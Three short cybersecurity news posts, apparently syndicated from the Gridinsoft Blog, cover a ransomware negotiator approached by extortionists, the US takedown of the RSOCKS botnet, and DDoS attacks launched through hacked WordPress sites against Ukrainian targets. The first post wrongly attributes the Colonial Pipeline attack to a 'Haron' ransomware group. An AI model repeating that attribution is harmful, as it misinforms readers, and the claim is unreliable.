After that, the hackers unexpectedly offered the negotiator to share the rest of their victims’ details with him to work for them. The crooks even offered the man to pay him a fee for each client; however, he refused.

As the expert concludes, the racketeers who contacted him were part of the Haron ransomware group, whose attack on Colonial Pipeline facilities stalled the supply of gas to the USA, eventually leading to arrests of the Russia-related hacking groups.

The post Companies Manage to Bargain With Ransomware Racketeers appeared first on Gridinsoft Blog.

According to the June 16 report by the US Department of Justice, the activity of a Russian botnet RSOCKS has been stopped in a joint operation by the US, German, Dutch, and British law enforcement agencies.

RSOCKS is responsible for hacking millions of network-connected devices. Initially, the botnet targeted IoT devices. The latter group includes industrial control systems, which makes the threats like the one in question highly important. The group, however, infected the Android devices and regular PCs too.

Law enforcement was long aware of RSOCKS activity. The Russian botnet got in the spotlight of police attention back in 2017 when over 300 000 devices in the San Diego district were hacked.

The malefactors monetized their hackings through a website where visitors could rent the segment of the botnet for different periods: days, weeks, months. The price varied from $30 per day (for 2000 proxies) to $200 per day (for 90000 hacked IPs.) Clients then could use bots for whatever they could be used: DDoS attacks, traffic routing, fake commentaries, etc.

The operation involved the undercover purchase of proxies with subsequent reverse inquiry into the Russian botnet back end and its victims. Eventually, the authorities managed to dismantle the infrastructure of the botnet. The Department appreciated the contribution of the foreign colleague agencies and the Black Echo private sector cybersecurity group.

The current operation is a part of a war on cybercrime consistently conducted by the US and Interpol, obviously concentrated around Russia-originating threats.

The post The US Department of Justice Reports a Russian Botnet Dismantled appeared first on Gridinsoft Blog.

CERT-UA has published a report on ongoing DDoS attacks on Ukrainian websites and a government web portal.

Unknown attackers compromise WordPress sites and inject malicious JavaScript code into the HTML structure. The script is base64 encoded to avoid detection like in this picture.

The code is executed on the visitor’s computer and generates a huge number of requests in order to stop the websites from working. Cyberattacks occur without the knowledge of the owners of compromised sites and create subtle performance disruptions for users.

By the way, we talked about the State Department Offers $1 million for Info on Russian Hackers.

CERT-UA works closely with the National Bank of Ukraine to implement protective measures against DDoS campaigns and numerous previous cyberattacks. In their report, the CERT-UA team provided instructions for removing malicious JavaScript code and added a threat detection tool to scan sites for hacking.

In addition, it is important to keep the content management systems (Content Management Systems, CMS) of the site up to date, update plugins and restrict access to site management.

We also note that it seems that the Chinese comrades do not support Russian hackers: we wrote that Chinese Mustang Panda Cyberspies Attack Russian Officials.

The post Ukraine Was Hit by DDoS Attacks from Hacked WordPress Sites appeared first on Gridinsoft Blog.